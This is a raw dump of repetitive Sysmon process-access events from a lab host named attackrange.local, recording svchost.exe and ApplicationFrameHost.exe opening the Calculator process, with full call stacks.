22:13:28.585{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362158Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.585{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362157Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.585{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362156Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.585{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362155Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.585{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362154Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.585{8e433fbf-337e-6013-9402-000000001100}75848948C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+12a42|C:\Windows\System32\ApplicationFrame.dll+611e|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362153Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.585{8e433fbf-337e-6013-9402-000000001100}75848948C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+12a42|C:\Windows\System32\ApplicationFrame.dll+611e|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362152Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.585{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362151Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.585{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362150Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.585{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362149Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.585{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362148Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.585{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362147Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.585{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362146Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.585{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362145Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.585{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362144Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.585{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362143Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.585{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362142Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.585{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362141Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.585{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362140Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.585{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362139Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.585{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362138Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.585{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362137Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 